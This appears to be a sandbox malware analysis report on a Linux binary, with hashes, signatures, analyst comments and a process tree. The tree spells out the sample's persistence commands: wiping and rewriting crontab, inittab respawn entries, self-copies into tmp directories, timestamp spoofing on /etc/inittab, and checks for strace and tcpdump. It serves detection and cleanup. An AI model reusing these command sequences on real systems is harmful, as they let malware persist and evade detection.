Analysis
max time kernel
0s -
max time network
102s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
submitted
14-03-2022 02:35
Static task
static1
Behavioral task
behavioral1
Sample
582a434ba0f2e04bd8b5495c50320068
Resource
ubuntu1804-amd64-en-20211208
0 signatures
0 seconds
General
Target
582a434ba0f2e04bd8b5495c50320068
Size
98KB
MD5
582a434ba0f2e04bd8b5495c50320068
SHA1
b3888d650646aa63423765e686a14ddc82ee52be
SHA256
7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
SHA512
5d4075888d1414f57edd832c6fb7151103af441eafebfdeb97be077bcfa504429f792c1fb23f18674aaf94ba1c6fa8d42e7c73a0d7f2d845f7d9faa605ac6fe4
Score
9/10
Malware Config
Signatures
Writes file to system bin folder 1 TTPs 3 IoCs — caveat: in the process tree below, /bin/crontab and /bin/uname appear only as executed children and /bin/nvram does not appear at all, so until the raw file-write events are checked treat these as paths the sample touched or looked up rather than confirmed binary replacement. The nvram references (a router/embedded utility) suggest the sample was built for embedded targets as well as this Ubuntu host, but that is inferred, not shown.
Processes:
description: /bin/crontab — ioc: /bin/crontab
description: /bin/nvram — ioc: /bin/nvram
description: /bin/uname — ioc: /bin/uname
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism. In this run the /etc/rc.local write is attributed to the sample process itself (PID 593), not to a shell child, so it is done in-binary. The shell children below layer two more mechanisms for each copy of the sample: a `* * * * * <copy> > /dev/null 2>&1 &` user crontab entry (after a `crontab -r` that wipes any existing crontab), and a `0:2345:respawn:<copy>` line appended to /etc/inittab via a temporary /etc/inittab2. After each inittab rewrite, `touch -acmr /bin/ls /etc/inittab` copies /bin/ls's timestamps onto /etc/inittab, so mtime-based integrity checks will not flag the change — compare inittab content, not timestamps.
Processes:
description: /etc/rc.local — ioc: /etc/rc.local — process: 582a434ba0f2e04bd8b5495c50320068
Write file to user bin folder 1 TTPs 2 IoCs
Processes:
description: /usr/bin/crontab — ioc: /usr/bin/crontab
description: /usr/sbin/nvram — ioc: /usr/sbin/nvram
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem. All four reads are of /proc/filesystems and are attributed to the cp children that duplicate the sample, so this is most likely ordinary coreutils behavior rather than sample-specific reconnaissance; do not weight it as an indicator on its own.
Processes:
description: /proc/filesystems — ioc: /proc/filesystems — process: cp
description: /proc/filesystems — ioc: /proc/filesystems — process: cp
description: /proc/filesystems — ioc: /proc/filesystems — process: cp
description: /proc/filesystems — ioc: /proc/filesystems — process: cp
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory. Here the sample runs from /tmp/582a434ba0f2e04bd8b5495c50320068, writes a hidden /tmp/.bawtz file (its purpose is not shown in this report), and copies itself with `cp -f` to /dev/shm, /var/tmp, /var/lock and /var/run, registering each copy in crontab and /etc/inittab. Cleanup therefore has to remove all five copies and every persistence entry, not just the /tmp original; /dev/shm and /var/run are tmpfs on most systems, so those copies vanish on reboot but are re-created by the surviving ones.
Processes:
description: /tmp/582a434ba0f2e04bd8b5495c50320068 — ioc: /tmp/582a434ba0f2e04bd8b5495c50320068 — process: cp
description: /tmp/582a434ba0f2e04bd8b5495c50320068 — ioc: /tmp/582a434ba0f2e04bd8b5495c50320068 — process: cp
description: /tmp/582a434ba0f2e04bd8b5495c50320068 — ioc: /tmp/582a434ba0f2e04bd8b5495c50320068 — process: cp
description: /tmp/582a434ba0f2e04bd8b5495c50320068 — ioc: /tmp/582a434ba0f2e04bd8b5495c50320068 — process: cp
description: /tmp/.bawtz — ioc: /tmp/.bawtz — process: 582a434ba0f2e04bd8b5495c50320068
Processes — note that the first shell children (PIDs 594–597) run `pidof -x strace` and `pidof -x tcpdump`, i.e. the sample probes for a tracer or packet capture before starting its persistence routine; the report does not show what it does when either is found, so behavior under instrumentation may differ from this trace.
-
./582a434ba0f2e04bd8b5495c50320068./582a434ba0f2e04bd8b5495c503200681⤵
- Modifies rc script
- Writes file to tmp directory
PID:593
-
/bin/shsh -c "pidof -x strace > /dev/null"1⤵PID:594
-
/bin/pidofpidof -x strace2⤵PID:595
-
/bin/shsh -c "pidof -x tcpdump > /dev/null"1⤵PID:596
-
/bin/pidofpidof -x tcpdump2⤵PID:597
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:600
-
/bin/catcat /etc/inittab2⤵PID:602
-
/bin/grepgrep -v /tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:604
-
/bin/shsh -c "crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:601
-
/usr/bin/crontabcrontab -l2⤵PID:605
-
/bin/grepgrep /tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:607
-
/bin/grepgrep -v "no cron"2⤵PID:608
-
/usr/bin/crontabcrontab -2⤵PID:612
-
/bin/shsh -c "crontab -r"1⤵PID:603
-
/usr/bin/crontabcrontab -r2⤵PID:606
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:609
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:610
-
/bin/catcat /etc/inittab22⤵PID:613
-
/usr/bin/crontabcrontab -l1⤵PID:614
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:615
-
/bin/rmrm -rf /etc/inittab22⤵PID:616
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:617
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:618
-
/bin/shsh -c "/bin/uname -n"1⤵PID:621
-
/bin/uname/bin/uname -n2⤵PID:623
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068"1⤵PID:622
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:624
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/dev/shm/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:626
-
/bin/catcat /etc/inittab2⤵PID:628
-
/bin/grepgrep -v /dev/shm/582a434ba0f2e04bd8b5495c503200682⤵PID:629
-
/bin/shsh -c "crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:627
-
/bin/grepgrep /dev/shm/582a434ba0f2e04bd8b5495c503200682⤵PID:631
-
/usr/bin/crontabcrontab -l2⤵PID:630
-
/bin/grepgrep -v "no cron"2⤵PID:636
-
/usr/bin/crontabcrontab -2⤵PID:640
-
/bin/shsh -c "echo \"0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:637
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:638
-
/bin/catcat /etc/inittab22⤵PID:641
-
/usr/bin/crontabcrontab -l1⤵PID:642
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:643
-
/bin/rmrm -rf /etc/inittab22⤵PID:644
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:645
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:646
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068"1⤵PID:647
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:648
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:650
-
/bin/catcat /etc/inittab2⤵PID:652
-
/bin/grepgrep -v /var/tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:653
-
/bin/shsh -c "crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:651
-
/usr/bin/crontabcrontab -l2⤵PID:654
-
/bin/grepgrep /var/tmp/582a434ba0f2e04bd8b5495c503200682⤵PID:655
-
/bin/grepgrep -v "no cron"2⤵PID:656
-
/usr/bin/crontabcrontab -2⤵PID:660
-
/bin/shsh -c "echo \"0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:657
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:658
-
/bin/catcat /etc/inittab22⤵PID:662
-
/usr/bin/crontabcrontab -l1⤵PID:661
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:663
-
/bin/rmrm -rf /etc/inittab22⤵PID:664
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:665
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:666
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068"1⤵PID:667
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/lock/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:670
-
/bin/catcat /etc/inittab2⤵PID:672
-
/bin/grepgrep -v /var/lock/582a434ba0f2e04bd8b5495c503200682⤵PID:673
-
/bin/shsh -c "crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:671
-
/usr/bin/crontabcrontab -l2⤵PID:674
-
/bin/grepgrep /var/lock/582a434ba0f2e04bd8b5495c503200682⤵PID:675
-
/bin/grepgrep -v "no cron"2⤵PID:677
-
/usr/bin/crontabcrontab -2⤵PID:680
-
/bin/shsh -c "echo \"0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:676
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:678
-
/bin/catcat /etc/inittab22⤵PID:681
-
/usr/bin/crontabcrontab -l1⤵PID:682
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:683
-
/bin/rmrm -rf /etc/inittab22⤵PID:684
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:685
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:686
-
/bin/shsh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068"1⤵PID:687
-
/bin/cpcp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c503200682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/var/run/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"1⤵PID:690
-
/bin/catcat /etc/inittab2⤵PID:692
-
/bin/grepgrep -v /var/run/582a434ba0f2e04bd8b5495c503200682⤵PID:694
-
/bin/shsh -c "crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"1⤵PID:691
-
/usr/bin/crontabcrontab -l2⤵PID:693
-
/bin/grepgrep /var/run/582a434ba0f2e04bd8b5495c503200682⤵PID:695
-
/bin/grepgrep -v "no cron"2⤵PID:696
-
/usr/bin/crontabcrontab -2⤵PID:699
-
/bin/shsh -c "echo \"0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"1⤵PID:697
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"1⤵PID:700
-
/bin/catcat /etc/inittab22⤵PID:702
-
/usr/bin/crontabcrontab -l1⤵PID:701
-
/bin/shsh -c "rm -rf /etc/inittab2"1⤵PID:703
-
/bin/rmrm -rf /etc/inittab22⤵PID:704
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"1⤵PID:705
-
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab2⤵PID:706